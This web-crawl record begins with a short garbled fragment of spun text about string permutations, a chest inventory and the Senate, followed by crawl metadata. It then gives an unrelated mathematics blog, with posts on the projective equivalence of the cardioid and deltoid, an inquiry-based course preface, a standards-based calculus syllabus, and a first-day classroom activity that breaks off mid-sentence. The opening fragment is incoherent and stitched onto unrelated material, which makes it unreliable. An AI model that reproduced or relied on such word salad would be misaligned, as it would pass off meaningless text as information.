duplicates without recursion makes use of Pointers will all occupy same., if you need to find permutations of a string using iteration can teach a... Before bottom screws a chest to my inventory 1, 4 and 3 of 4! given... Senate, wo n't new legislation just be blocked with a red, blue black. A small project using permutation to generate common email address permutations for you elements can if!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8917768,"math_prob":0.92648864,"size":33366,"snap":"2021-04-2021-17","text_gpt3_token_len":7718,"char_repetition_ratio":0.1505905,"word_repetition_ratio":0.17005864,"special_character_ratio":0.24027453,"punctuation_ratio":0.14896074,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9785173,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-11T22:28:56Z\",\"WARC-Record-ID\":\"<urn:uuid:07e14d14-44a6-4ec7-be37-205d3e018f19>\",\"Content-Length\":\"45691\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1a716b3c-a81d-4f15-893f-0b2209c7c588>\",\"WARC-Concurrent-To\":\"<urn:uuid:53394602-3f4e-4aca-8296-1b92cab2109e>\",\"WARC-IP-Address\":\"160.153.47.35\",\"WARC-Target-URI\":\"http://pgamo.com/die-hard-ahuwa/d1f722-find-permutation-id\",\"WARC-Payload-Digest\":\"sha1:K3QQ5XOBF5GR3OBREYOYW7TYIM6M5WHV\",\"WARC-Block-Digest\":\"sha1:WPGLMGPBA5GCWX5DHKR6ITNENMODNQFA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038065492.15_warc_CC-MAIN-20210411204008-20210411234008-00018.warc.gz\"}"}
https://thalestriangles.blogspot.com/
[ "Monday, July 15, 2019\n\ncardioid, deltoid, folium\n\nThe cardioid and the deltoid are two of my favorite curves. They arise in similar ways: one is an epicycloid, and the other is a hypocycloid. In a sense, each is the simplest non-trivial example of their respective type. They make excellent examples for calculus problems. But as I learned this week, they are actually the same curve.\n\nThis post is about the claim made in italics in the previous paragraph. Obviously I don’t mean that the classical constructions mentioned above (and described below) produce the same curves in the Euclidean plane. Rather, they are the same from the perspective of complex projective geometry. When I searched for this fact on Google after uncovering it for myself, I only found one mention of it, in a textbook from 1923 entitled An Introduction to Projective Geometry. I assume it was well-known at the time, and today is probably known to certain algebraic geometers, but it seems worth explicating for a larger audience.\n\nFirst, the curves. Epicycloids and hypocycloids are both examples of roulettes, curves traced out by a point marked on one curve, which is free to move, as it rolls along another curve, which is fixed, without slipping. To generate an epicycloid or hypocycloid, both the fixed curve and the moving curve are circles; the difference is that for an epicycloid, the rolling circle is outside the fixed circle, and for a hypocycloid the rolling circle is on the inside. The shape of the epicycloid or hypocycloid is determined by the ratio of the circles’ radii. For an epicycloid, we can choose a 1:1 ratio, which means the marked point on the rolling circle makes contact with the fixed circle once as the outer circle completes a circuit. A hypocycloid cannot be constructed from circles whose radii have a 1:1 ratio, and a 2:1 ratio simply produces a line segment, so the simplest hypocycloid arises from a 3:1 ratio. The construction of these simplest examples is illustrated below. (These animations were created using a Desmos graph with the help of GIFsmos.) The first is called the cardioid (“heart-like”) and the second is the deltoid (“triangle-like”).\n\nIn both cases, the rolling circle is given a radius of 1, and in both cases the centers of the two circles remain at a distance of 2. By watching carefully, one can see that in both cases the marked point makes two revolutions around the center of the rolling circle. For the cardioid, these revolutions are counterclockwise, and so the cardioid can be parameterized by $(2\\cos\\theta + \\cos2\\theta, 2\\sin\\theta + \\sin2\\theta)\\text.$ In the case of the deltoid, the marked point’s revolutions are made clockwise, and so the deltoid can be parameterized by $(2\\cos\\theta + \\cos2\\theta, 2\\sin\\theta - \\sin2\\theta)\\text.$ These formulas are very similar, but certainly not the same, and the pictures they produce are quite different. So how can I claim that the curves are the same?\n\nOur first step toward understanding the claim involves switching to complex numbers. If we collect the $x$- and $y$-coordinates of the plane $\\mathbb{R}^2$ into a single complex coordinate, then the parameterizations above become\n\n$2e^{i\\theta} + e^{2i\\theta} \\qquad$ and $\\qquad 2e^{i\\theta} + e^{-2i\\theta}$.\nNow we want to extend to the complex plane $\\mathbb{C}^2$ (note: I think of $\\mathbb{C}$ as the complex line because it is one-dimensional as a complex vector space). A standard trick is to add a second coordinate that is conjugate to the first, which makes the parameterizations\n$\\big(2e^{i\\theta} + e^{2i\\theta},2e^{-i\\theta} + e^{-2i\\theta}\\big) \\qquad$ and $\\qquad \\big(2e^{i\\theta} + e^{-2i\\theta},2e^{-i\\theta} + e^{2i\\theta}\\big)$.\nNow let’s set $t = e^{i\\theta}$ and allow $t$ to take on all complex values (except $0$, but we’ll take care of that later) instead of just values on the unit circle. At the same time, let’s label the parameterizations $\\gamma_C$ and $\\gamma_D$, with $C$ standing for cardioid and $D$ for deltoid. This gives us\n$\\gamma_C(t) = \\left(2t + t^2,\\dfrac{2}{t} + \\dfrac{1}{t^2}\\right) \\qquad$ and $\\qquad \\gamma_D(t) = \\left(2t + \\dfrac{1}{t^2},\\dfrac{2}{t} + t^2\\right)$.\nWe still can see superficial similarities in these formulas, but not enough to conclude that they define equivalent curves. In order to see their equivalence, we need to see what’s happening at infinity, which means introducing some projective geometry.\n\nThe complex projective line $\\mathbb{P}^1$, also known as the Riemann sphere, is obtained by adding a single point, labeled $\\infty$, to the ordinary complex line $\\mathbb{C}$. The points of $\\mathbb{P}^1$ may be thought of as the “slopes” of lines through the origin in $\\mathbb{C}^2$. Indeed, it is often useful to assign coordinates to $\\mathbb{P}^1$ using non-zero vectors $(s,t)$ in $\\mathbb{C}^2$, where two vectors correspond to the same point of $\\mathbb{P}^1$ if they are scalar multiples of each other, $(s,t)\\sim(\\lambda s,\\lambda t)$ if $\\lambda\\in\\mathbb{C}\\setminus\\{0\\}$. We write the equivalence class of $(s,t)$ as $[s:t]$; these are called homogeneous coordinates on $\\mathbb{P}^1$. We can recover $\\mathbb{P}^1$ as $\\mathbb{C}\\cup\\{\\infty\\}$ by sending $[s:t]$ to the slope $t/s$ if $s \\ne 0$; then $[0:1]$ is sent to $\\infty$.\n\nIn a similar way, we can extend $\\mathbb{C}^2$ to the complex projective plane $\\mathbb{P}^2$ by adding points at infinity, and the most convenient way to do so is by homogenous coordinates. We start with non-zero vectors $(u,v,w)$ in $\\mathbb{C}^3$ and consider $(\\lambda u, \\lambda v, \\lambda w)$ to define the same point of $\\mathbb{P}^2$ as $(u,v,w)$ if $\\lambda\\in\\mathbb{C}\\setminus\\{0\\}$. Then $[u:v:w]$ are homogeneous coordinates on $\\mathbb{P}^2$. The points with $u\\ne0$ correspond to points of the original complex plane $\\mathbb{C}^2$, by sending $[u:v:w]$ to $(v/u,w/u)$. The points with $u=0$ constitute the new line at infinity, which is just a copy of $\\mathbb{P}^1$ with coordinates $[0:v:w]$.\n\nNow we can extend the cardioid and the deltoid to curves in $\\mathbb{P}^2$, not just $\\mathbb{C}^2$. We start with the parameterizations $\\gamma_C$ and $\\gamma_D$, append an initial coordinate of 1, then clear denominators (we can do this because of the equivalence that defines homogeneous coordinates). Then we get\n\n$\\gamma_C(t) = \\big[t^2:2t^3 + t^4:2t + 1\\big] \\qquad$ and $\\qquad \\gamma_D(t) = \\big[t^2:2t^3 + 1:2t + t^4\\big]$.\nThese allow for the possibility of $t = 0$, but apparently leave out the point at infinity $\\infty$, so we make one more modification, replacing $t$ with $t/s$ and again clearing denominators to obtain\n$\\gamma_C([s:t]) = \\big[s^2 t^2:2st^3 + t^4:2s^3t + s^4\\big] \\qquad$ and\n$\\qquad \\gamma_D([s:t]) = \\big[s^2t^2:2st^3 + s^4:2s^3t + t^4\\big]$.\nHere we see a feature characteristic of maps from one projective space to another, when homogeneous coordinates are used: each component of the map must be homogeneous of the same degree (in this case, four). By expressing the parameterizations of the cardioid and the deltoid in this way, we see that both curves touch the line at infinity at the two points $[0:1:0]$ and $[0:0:1]$, corresponding to $[0:1]$ and $[1:0]$, respectively, for the cardioid, and in the reverse order for the deltoid. Still this isn’t enough to show that the curves are the same! We need one more ingredient.\n\nA projective transformation of $\\mathbb{P}^1$ or $\\mathbb{P}^2$ is induced by a linear transformation of the homogeneous coordinates. Readers who are already familiar with the Riemann sphere will recognize projective transformations of $\\mathbb{P}^1$ as Möbius transformations (also known as fractional linear transformations): given $a,b,c,d\\in\\mathbb{C}$, we can convert $[s:t] \\mapsto [as+bt:cs+dt]$ to a Möbius transformation in the coordinate $z = s/t$, where it becomes $z \\mapsto \\dfrac{az+b}{cz+d}$. The condition for this function to be invertible is $ad - bc \\ne 0$, which is the same as the condition for the matrix $\\begin{bmatrix}a & b \\\\ c & d\\end{bmatrix}$ to be invertible. In the same way, projective transformations of $\\mathbb{P}^2$ arise from invertible linear transformations of $\\mathbb{C}^2$. Two objects in $\\mathbb{P}^1$ or $\\mathbb{P}^2$ are called projectively equivalent if there is a projective transformation that carries one to the other. And now we can state precisely what was meant in the opening paragraph:\n\nThe cardioid and the deltoid are projectively equivalent in $\\mathbb{P}^2$.\n\nBut how do we find the projective equivalence? A clue may be found in one clear difference between the original curves drawn in the Euclidean plane, which niggled at me while I was trying to figure out their relationship. The deltoid clearly has three cusps, while the cardioid apparently only has one. If the curves are equivalent, where are the other cusps of the cardioid? The answer: on the line at infinity!\n\nHow can we tell? It’s time to apply some differential geometry and look at the tangent lines of these two curves. Returning to the parameterizations in terms of $t$, we find\n\n$\\gamma_C'(t) = \\left(2 + 2t,-\\dfrac{2}{t^2} - \\dfrac{2}{t^3}\\right) \\qquad$ and $\\qquad \\gamma_D'(t) = \\left(2 - \\dfrac{2}{t^3},-\\dfrac{2}{t^2} + 2t\\right)$.\nNow a line in $\\mathbb{C}^2$, with coordinates $(v,w)$, passing through $(a,b)$ in the direction $(s,t)$ has the equation $\\begin{vmatrix} s & v - a \\\\ t & w - b \\end{vmatrix} = 0$. Thus the tangent line to the cardioid at $\\gamma_C(t)$ has the equation $\\begin{vmatrix} 2 + 2t & v - \\big(2t + t^2\\big) \\\\ -\\frac{2}{t^2} - \\frac{2}{t^3} & w - \\big(\\frac{2}{t} + \\frac{1}{t^2}\\big) \\end{vmatrix} = 0$ which, after some simplification, becomes $wt^3 - 3t^2 - 3t + v = 0\\text{.}$ This is the line equation of the cardioid. In a similar fashion, we can find the line equation of the deltoid, which is $t^3 - vt^2 + wt - 1 = 0\\text{.}$\n\nHaving the line equation of a curve, in terms of a parameter $t$, can be useful in several ways. As $t$ varies over $\\mathbb{P}^1$, it produces all the tangent lines of the curve. (We’ll clarify what happens when $t = \\infty$ in a moment.) But we can also let $(v,w)$ vary over $\\mathbb{C}^2$ and find, for each point, which tangent lines of the curve pass through that point. Because the line equations of the cardioid and the deltoid are cubic polynomials in $t$, most points of $\\mathbb{C}^2$ will lie on three tangent lines. Those points that lie on fewer than three tangent lines play a special role.\n\nLet’s illustrate first with the deltoid. We’ll be looking at lots of cube roots, so let $\\omega = e^{i\\,2\\pi/3}$; this means that $\\omega^3 = 1$ and $1 + \\omega + \\omega^2 = 0$. When $(v,w)=(0,0)$, the line equation becomes $t^3 - 1 = 0$, so the tangent lines of the deltoid that pass through the origin correspond to the parameters $1$, $\\omega$, and $\\omega^2$. Indeed, the three points $\\gamma_D(0) = (3,3)$, $\\gamma_D(\\omega) = (3\\omega,3\\omega^2)$, and $\\gamma_D(\\omega^2) = (3\\omega^2,3\\omega)$ are the three cusps of the deltoid. On the other hand, a point that belongs to the deltoid lies on tangent lines corresponding to at most two parameters (two of the points of tangency have “coalesced”). For example, when $(v,w)=(-1,-1)$, the line equation becomes $t^3 + t^2 - t - 1 = 0$, or $(t+1)^2(t-1) = 0$. At a cusp, all three tangent lines coincide: for example, when $(v,w)=(3,3)$, the line equation is $3t^3 - 3t^2 + 3t - 3 = 3(t-1)^3 = 0$. See the pictures below.\n\nWe can homogenize the line equation of the deltoid by replacing $t$ with $t/s$ and $(v,w)$ with $(v/u,w/u)$ and clearing denominators to obtain: $ut^3 - vst^2 + ws^2t - us^3 = 0\\text.$ When $[s:t] = [1:0]$ or $[0:1]$ (remember, this second point in homogeneous coordinates corresponds to $t=\\infty$), we get the same equation of the tangent line, $u = 0$. This is the equation of the line at infinity, so the line at infinity is tangent to the deltoid at both $[0:0:1]$ and $[0:1:0]$! A line that is tangent to a curve at two points is called a bitangent.\n\nThe cardioid also has a bitangent, which is easier to see: when $t = \\omega$ or $t = \\omega^2$, respectively, the line equation of the cardioid becomes $w - 3\\omega^2 - 3\\omega + v = 0$ or $w - 3\\omega - 3\\omega^2 + v = 0$, both of which are equivalent to $v + w = 3$. The visible cusp occurs at $(-1,-1)$, where the line equation becomes $(t + 1)^3 = 0$. For an example of more generic behavior, look at $(-3,-3)$, where the line equation becomes $3t^3 + 3t^2 + 3t + 3 = 0$, or $3(t + 1)(t + i)(t - i) = 0$. See pictures below.\n\nThe homogeneous version of the cardioid’s line equation is $wt^3 - 3ust^2 - 3us^2t + vs^3 = 0\\text.$ When $[s:t] = [1:0]$, this becomes the $w$-axis $v = 0$, and when $[s:t] = [0:1]$, we get $w = 0$. In each of these cases, we see that only one tangent line passes through the point, just as we saw for the cusps of the deltoid. So we have identified the three cusps of the cardioid—$[1:-1:-1]$, $[0:0:1]$, and $[0:1:0]$. The tangent lines through all three of these cusps pass through the origin in $\\mathbb{C}^2$, with homogeneous coordinates $[1:0:0]$.\n\nWe now have enough information to show the equivalence of the cardioid and the deltoid. To define a projective transformation from $\\mathbb{P}^1$ to itself, we need to specify where three points go; to define a projective transformation from $\\mathbb{P}^2$ to itself, we need to specify the images of four points, no three of which are collinear. We’ll show how to transform the line equation of the deltoid into the line equation of the cardioid via pullback.\n\nWe’re looking for projective transformations $f : \\mathbb{P}^1 \\to \\mathbb{P}^1$ and $g : \\mathbb{P}^2 \\to \\mathbb{P}^2$ such that $\\gamma_D \\circ f = g \\circ \\gamma_C$. Starting with $f$, we require\n\n$f\\big([1:0]\\big) = [1:\\omega]$,   $f\\big([0:1]\\big) = [\\omega:1]$,   and   $f\\big([1:-1]\\big) = [1:1]$,\nso that the parameters of the cardioid’s cusps are sent to those of the deltoid’s cusps. This can be accomplished by defining $f\\big([s:t]\\big) = [s - \\omega t : \\omega s - t]\\text.$ Meanwhile, $g$ needs to satisfy\n$g\\big([0:0:1]\\big) = [1:3\\omega:3\\omega^2]$,  $g\\big([0:1:0]\\big) = [1:3\\omega^2:3\\omega]$,\n$g\\big([1:-1:-1]\\big) = [1:3:3]$,   and   $g\\big([1:0:0]\\big) = [1:0:0]$,\nwhich is accomplished by $g\\big([u:v:w]\\big) = [ 3u+v+w : 3\\omega^2 v + 3\\omega w : 3\\omega v + 3\\omega^2 w ]\\text.$ Now substitute the components of $f$ and $g$ into the variables of the deltoid’s line equation, expand, and simplify. The result is the line equation of the cardioid. You can calculate this by hand, or just let SageMath do it for you:\n\nOne of the curves mentioned in the title of this post has been conspicuously absent so far: the folium of Descartes. This is another favorite curve of mine, invariably given in my calculus classes as an exercise in implicit differentiation. Its equation is $x^3 + y^3 = xy$.\n\nSo what’s the connection between this curve and the others? Well, if we extract the coefficients from the deltoid’s line equation and use them to define a new curve $\\gamma_F$, we get $\\gamma_F\\big([s:t]\\big) = [ s^3 - t^3 : st^2 : -s^2 t ]\\text,$ which parameterizes $v^3 + w^3 = uvw\\text,$ the homogeneous version of the folium’s equation. This means that the folium is dual to the deltoid (and thus also to the cardioid)! The tangent lines of the cardioid/deltoid have been converted into points of the folium, and likewise points of the cardioid/deltoid become tangent lines of the folium. Just as each point of $\\mathbb{C}^2$ lies on three tangent lines of the cardioid/deltoid, counted with multiplicity, each line of $\\mathbb{C}^2$ intersects the folium at three points, counted with multiplicity. The bitangent of the deltoid and cardioid has been converted into a point of self-intersection. If we look at points of the form $[1:v:\\bar{v}]$, then the threefold symmetry of the folium is revealed (the three asymptotic directions correspond to the three tangent lines that pass through the origin, which as we saw are the tangent lines at the cusps).\n\nSaturday, December 29, 2018\n\nan IBL preface\n\nIn just over a week, I will distribute to students the first piece of the complex variables notes I have been writing. Here is a preface to be included with the notes, to motivate the IBL structure. The details of the class will be spelled out in the syllabus; this is just to set the tone.\n\nYou are the creators. These notes are a guide.\n\nThe notes will not show you how to solve all the problems that are presented, but they should enable you to find solutions, on your own and working together. They will also provide historical and cultural background about the context in which some of these ideas were conceived and developed. You will see that the material you are about to study did not come together fully formed at a single moment in history. It was composed gradually over the course of centuries, with various mathematicians building on the work of others, improving the subject while increasing its breadth and depth.\n\nMathematics is essentially a human endeavor. Whatever you may believe about the true nature of mathematics—does it exist eternally in a transcendent Platonic realm, or is it contingent upon our shared human consciousness? is math “invented” or “discovered”?—our experience of mathematics is temporal, personal, and communal. Like music, mathematics that is encountered only on as symbols on a page remains inert. Like music, mathematics must be created in the moment, and it takes time and practice to master each piece. The creation of mathematics takes place in writing, in conversations, in explanations, and most profoundly in the mental construction of its edifices on the basis of reason and observation.\n\nTo continue the musical analogy, you might think of these notes like a performer’s score. Much is included to direct you towards particular ideas, but much is missing that can only be supplied by you: participation in the creative process that will make those ideas come alive. Moreover, the success of the class will depend on the pursuit of both individual excellence and collective achievement. Like a musician in an orchestra, you should bring your best work and be prepared to blend it with others’ contributions.\n\nIn any act of creation, there must be room for experimentation, and thus allowance for mistakes, even failure. A key goal of our community is that we support each other—sharpening each other’s thinking but also bolstering each other's confidence—so that we can make failure a productive experience. Mistakes are inevitable, and they should not be an obstacle to further progress. It’s normal to struggle and be confused as you work through new material. Accepting that means you can keep working even while feeling stuck, until you overcome and reach even greater accomplishments.\n\nThese notes are a guide. You are the creators.\n\nMonday, September 03, 2018\n\n2018 calculus syllabus\n\nIn my last post, I explained a bit about how I feel like my syllabus is a work-in-progress, even though the semester has started and I’m already using it. In this post I’ll give some more details and even more history. I’ll quote extensively from my syllabus verbatim; here is a link to the entire thing for anyone who is interested.\n\nRevising my syllabus for this semester really began last fall. I wasn’t entirely blind to the faults that were starting to show. One major change was in restructuring the exam schedule. When I switched to standards-based grading in calculus 1, I also started weekly quizzes (which students took on their own time outside of class) and had three midterm exams plus a final. The quizzes functioned as a sort of preliminary assessment for most of the standards. Each test covered about eight standards. After the third test, there were a couple more standards we covered in class, which were only assessed on a quiz and the final exam. Even with three midterms, however, I had often felt like students were rushed in completing them. I also began to question the value of the out-of-class quizzes. So I turned the quizzes into “labs” that students were free to collaborate on, and I switched from three midterm exams to five, which would formally assess every standard before the final.\n\nI really liked how having five midterms broke up the material. Each test became more coherent in the material it included. Exam 1 covered limits. Exam 2, definition and interpretation of derivatives. Exam 3, rules for differentiation. Exam 4, applications of derivatives. Exam 5, definition of integrals and the Fundamental Theorem of Calculus. Especially helpful was splitting up the applications of derivatives (l'Hospital's rule, optimization, related rates, and so on) from the introduction to integrals; these topics had usually been all jumbled together in the last midterm, compounding the difficulty already created by it being late in the sester. Also, by dedicating one test just to derivative rules, I was moving towards having a Differentiation Gateway Exam, as several of my colleagues at Pepperdine use. And paired with that move was an awareness that I was gravitating towards a specifications framework.\n\nThis fall, I decided to maintain the five-midterm structure and get rid of the quizzes/labs, to be replaced by an occasional more substantial homework exercise that will be used in class. I collected seven standards into the Gateway Exam, which will form the bulk of the third midterm. I split the remaining standards into 45 “tasks”, which is a term I hope will be clearer than “standards”; each standard split into approximately two tasks. The idea of tasks goes back in my mind to the list of problems Kate Owens shared from her Ph.D. advisor George McNulty. That is, a task is a specific type of problem that students will show they know how to solve. Here is the new introduction to the “Goals and Assessment” section of my syllabus:\n\nChange is present all around us, and understanding it is an essential component of many fields of study. Calculus is fundamentally a set of tools for measuring, quantifying, estimating, and interpreting change in a variety of contexts. In this course, we will delve into some of the most profound ideas in mathematics, whose roots are from ancient times and which began to develop fully in the 17th century; they continue to form the basis for much of modern science. My hope is that this class will develop your analytical ability and deepen your appreciation for the power and elegance of mathematics.\n\nThe skills you should acquire are related to the Learning Outcomes stated on the first page of this syllabus. Your mastery of the course content will be assessed through your performance on a collection of definite tasks. A complete list of tasks is on the last two pages of this syllabus. These tasks, rather than points or percentages, will be the primary basis for grading. The following sections provide details on how the tasks will be assessed and what you should accomplish in order to earn your final grade.\n\nMy hope is that this method of assessment, called standards-based grading or mastery grading, will keep you clearly informed as to the expectations of the class and how well you are meeting them, while also removing the (often distracting) elements of linear grading that uses letters or total points. Learning is not always a straightforward process, and one of my goals is to give you as many opportunities as possible to demonstrate your understanding. I will be glad to do everything I can to help you towards your goal of mastery. If you have questions or concerns at any time, please feel free to discuss them with me.\n\nAnother potential source of confusion from my SBG system in the past was the levels of ranking. I really liked that we were using the vocabulary of mastery / proficiency / basic ability / novice to talk about students’ progress, but it was rare that a student could rate their own work with one of these levels. So this fall I opted, as many others have, for a simple pass/fail approach on tasks. I don’t like the pass/fail language, however, so I chose successful for a task completed satisfactorily and progressing or incomplete for work that has major mistakes or is absent. I also wanted to handle small mistakes through a faster revision process, an idea I picked up from MathFest; for these situations, I added a revisions needed category. Here is how I describe the rating system in my syllabus:\n\nA task is a problem or a collection of similar problems that should be solved using calculus tools. Your progress in the class will be measured in terms of the number of tasks that you accomplish. Partial credit is not given; a task must be fully successful in order to count towards your final grade. Whenever a task is included on an exam, your work will receive one of four ratings:\nSsuccessful Solution is complete and correct.\nRminor revisions needed Solution is correct except for small errors.\nPprogressing Partial understanding is evident, but solution contains substantial errors.\nIincomplete Not enough evidence is available to provide an assessment.\nA task marked “S” has been completed; you can check it off the list at the end of the syllabus.\nA task marked “R” can have a small mistake such as an arithmetic error or a miscopied value. You will have 48 hours (or over the weekend if the work is returned on a Friday) to complete a Revision Form that explains how to correct the mistakes, and to submit the form along with your original work, in order to earn a successful rating.\nA task marked “P” demonstrates progress in mastering the topic, but reassessment is necessary in order to successfully accomplish the task.\nA task marked “I” shows little or no relevant work. Reassessment is necessary.\nTo show mastery of a task after it has received a rating of P or I, see the section entitled “Reassessment” on the next page.\nHopefully this simplified rating system will also make it easier for me to track student progress over the duration of the semester and analyze trends afterwards. (I agree with Kate that Drew’s “A tale of two students” chart was a moment of clear inspiration at MathFest.)\n\nIn order to help students know what is expected to prepare for reassessment, and to help me schedule them more effectively, I have introduced Reassessment Tickets:\n\nAfter a task has been assessed on an exam, you may schedule a reassessment if you did not successfully complete the task. This is a two-step process:\n• First, pick up a Reassessment Ticket from my door or download and print one from the Courses site. Complete the form and return it to me at least 24 hours before you want a reassessment.\n• Second, once a meeting is scheduled, come to my office and I will give you a new opportunity to demonstrate mastery of the task. If possible, I will grade your work immediately; otherwise, I will let you know the result by the following day.\nI will reassess up to two tasks per student per week. In addition, you can use exam days as opportunities for reassessment of up to three tasks, provided you let me know 48 hours in advance which ones.\nI plan to use one or two class days at the end of the semester for reassessment alongside review, as well.\n\nAnother element I introduced was subcategories of tasks: “core”, “modeling”, and “additional“ (not a great name, I’ll try to find a better one in the future). Again, lots of other people are already doing this, and I like what many of them are doing, which is to require two demonstrations of mastery for core skills and only one for the rest. I couldn’t figure out how to make that work with my system, so I made the following distinction: core tasks are the ones that could appear on the final exam. There are 14 of them, and I will choose seven to go on the final. (The final exam will also include a reflection essay, and a period of time for additional reassessment.) I also set higher expectations for how many core vs. additional tasks needed to be successful at each grade level.\n\nWhat I learned from creating a list of tasks is that, because I state exactly what types of questions I will include on the tests, there is less wiggle room than with standards, which could always be applied to new sorts of problems. (This is the distinction between activity and ability I talked about in my last post.) I don’t know if my list of tasks, or the categorizing thereof, is ideal, but it is certainly enough to guarantee that a student who succeeds at all of them will have mastered calculus 1. (I used Robert’s classification of “core” and “supplemental” learning targets as a reference while I was sorting, but our lists don’t match up exactly.)\n\nAfter all the work that goes into getting away from letter grades in a standards-based system, it’s always a bit dispiriting to turn back to them. So I start my section on “Final letter grades” with a bit of reluctance (not to say snark).\n\nAt the end of the semester, I am required to submit to the university a letter grade reflecting your achievement in this class. Here is how that grade will be determined.\n\nTo earn an A: in addition to passing the Gateway Exam and completing the Final Reflection,\n• Submit 20 homework reports.\n• Complete all modeling tasks.\n• Complete all core tasks.\n• Complete 6 core tasks on the final exam (minor errors are acceptable).\nTo earn an B: in addition to passing the Gateway Exam and completing the Final Reflection,\n• Submit 15 homework reports.\n• Complete 2 modeling tasks.\n• Complete 12 core tasks.\n• Complete 5 core tasks on the final exam (minor errors are acceptable).\nPassing the Gateway Exam is required to earn a final grade of B– or higher.\n\nTo earn an C: in addition to completing the Final Reflection,\n• Submit 10 homework reports.\n• Complete 1 modeling task.\n• Complete 10 core tasks.\n• Complete 17 additional tasks OR pass the Gateway Exam and complete 14 additional tasks.\n• Complete 4 core tasks on the final exam (minor errors are acceptable).\nFailure to complete a Final Reflection will result in a grade of D or F.\n\nTo earn a D:\n• Submit 5 homework reports.\n• Complete any 30 tasks from C.1–C.14, A.1–A.28, M.1–M.3 OR pass the Gateway Exam and complete any 23 tasks.\n• Complete 3 core tasks on the final exam (minor errors are acceptable).\nPlusses and minuses will be assigned as follows: if all criteria for a letter grade are met as well as two or three of those for a higher letter grade, then a plus will be added. If all but one or two criteria for a letter grade are met, and the remaining items meet the criterion for one letter grade lower, then the higher letter will be given with a minus added.\n\nI will use my discretion to assign a final letter grade in cases where a different set of conditions is met.\n\nSo there it is. My syllabus for calculus this semester. I’m sure by December, or even October, I’ll have a much better notion of what changes I should have made. I’ll let you know how it goes.\n\n(I should also have given more attribution in this post to the people I stole ideas from, especially at MathFest, but I don’t have those notes on hand right now. So a general word of thanks goes out to this very sharing community.)\n\nSunday, September 02, 2018\n\nprologue to a syllabus\n\n(This was originally supposed to be the post in which I describe my syllabus for the fall. I started writing some preliminary comments, and they got out of control. I’ll get back to the syllabus itself in my next post.)\n\nFirst, I must express some gratitude. Thanks to parental leave provided by the state of California and my school, I did not have any teaching duties last spring. It was my first time not teaching first-semester calculus in four years. As I tell my students, calculus 1 is actually one of my favorite classes to teach, but I could tell by last fall that some parts of the course were getting stale. Having a semester break meant that, in addition to getting to know my newborn daughter, I could let my ideas on how to improve calculus instruction and assessment simmer for a bit.\n\nActually, it’s not entirely honest to refer to “my ideas” in this setting; what I really needed was a chance to reflect on ideas I’d been picking up (stealing) from others, and even better, to acquire (steal) some fresh ideas, which a workshop and conference provided over the summer. A fabulous community of college and university math teachers has formed around the question of how to improve our assessment practices, and the rate at which sharing/stealing/developing ideas is remarkably fast.\n\nOver the past few weeks, as the fall semester has started up, several people have shared their syllabi along with extensive, thoughtful commentary on how they created them. I’ve been holding back, however, because while I believe my syllabus is better than it was last year, by the time the semester started I only felt like I had gotten it to “just good enough.” Some ideas aren’t fully developed yet, some feel out of balance, and some are plain risky. Nevertheless, in the spirit of community and maintaining a growth mindset, I’ve decided to go ahead and share my syllabus, too, warts and all.\n\nSince I see this as a long-term work in progress, I’d like to begin with a few words about that progress. (These comments will parallel somewhat my talk from MathFest last month.) I started using standards-based grading in spring 2013, largely as a way to improve the feedback I was giving students. After a reasonably successful first attempt, I began using alternative assessment methods in all of my classes. Some worked better than others, but because I was teaching calculus 1 so often, my SBG system for that class developed into a collection of 25–30 standards that became fairly stable.\n\nAround the same time, Robert Talbert was blogging about specifications grading, a well-developed and flexible framework whose goals, in the words Linda Nilson uses to subtitle her book on the topic, are “restoring rigor, motivating students, and saving faculty time.” For a while I remained skeptical about specs grading, because I couldn’t understand why anyone would turn to something besides my beloved standards. Eventually, however, I realized that SBG as I conceived it didn’t work in every situation, and so I delved more into specs. The Google+ community initiated by Robert goes by the name SBSG, to include both standards-based and specifications grading. Today the language of the community encompasses these and other alternative assessment systems under the broader term mastery grading, which hearkens back to Bloom’s terminology of mastery learning.\n\nAt MathFest, I talked a bit about this history of my classes and did some compare-and-contrast between SBG and specs grading. Possibly the most useful contribution I made to that session was the following six-word summary of how they relate:\n\nStandards emphasize content.\nSpecifications emphasize activity.\nHere’s another way to phrase the distinction in my mind: When we create standards, we are answering the question what do we want students to be able to do? When we create specifications, we are answering the question what do we want students to have done? More bluntly, standards are what we want to measure, while specifications are what we can actually measure; the latter is a proxy for the former.\n\nI guess my claim is that standards and specifications support each other: they are two sides of the same coin. We need specifications in order to determine how standards will be assessed, and a clear list of standards keeps specifications from becoming arbitrary. (Or as Drew Lewis said on Twitter, “specs are how I assign letter grades, with the primary spec being mastery of standards.”) Whether I say that an assessment system is based on specifications or standards depends on whether the description of the system focuses on the proxy or the thing for which it proxies.\n\nBy last fall, some cracks in my SBG system for calculus had started to show. Every semester, I had a couple of students at the end of the course who still thought it wasn’t clear. The homogeneity of the list of standards was mushing the most important concepts together with secondary ones. Worst of all from a practical standpoint, I was finally getting overwhelmed by reassessments after years of claiming that SBG didn’t take any more of my time than traditional grading. I knew I needed to make some changes to clarify and streamline the assessment process.\n\nWhat I have for now isn’t perfect, but it will get me through the semester. With this lengthy prologue complete, in my next post I’ll share parts of my syllabus and explain what I hope it achieves.\n\nMonday, August 27, 2018\n\n“Create Your Own” part 1\n\nToday was the first day of calculus for the fall semester of 2018. As a first-day activity, I wanted to do something that didn’t require any calculus knowledge and could break students out of the mindset that doing math is always about solving particular problems that have been fed to you.\n\nSo I initiated a sequence of exercises I’m planning, which I’ve come to think of collectively as “Create Your Own…”. In this case, I gave the following prompt:\n\nThe number 1 can be written many different ways, for example 4 – 3 or 10/10.\nCome up with ten different expressions that equal 1. Be creative!\nTry to have at least four of your solutions involve some kind of algebraic expression, like a variable x.\nAfter they had a few minutes to work individually, I had them share their answers in small groups, and each group picked out what expression by its members they thought was most creative. At the end of class, I collected all of their solutions to look at later in the day.\n\nIn having students do this exercise, I learned a lot, and I would definitely do it again, with a few tweaks. Here’s some of what I learned:\n\n• Students judge creativity differently than I do. In looking over the collective work this evening, I saw some excellent examples of splitting 1 into a sum of fractions or decimals and some elaborate expressions involving absolute values or square roots. But the groups often picked examples with the 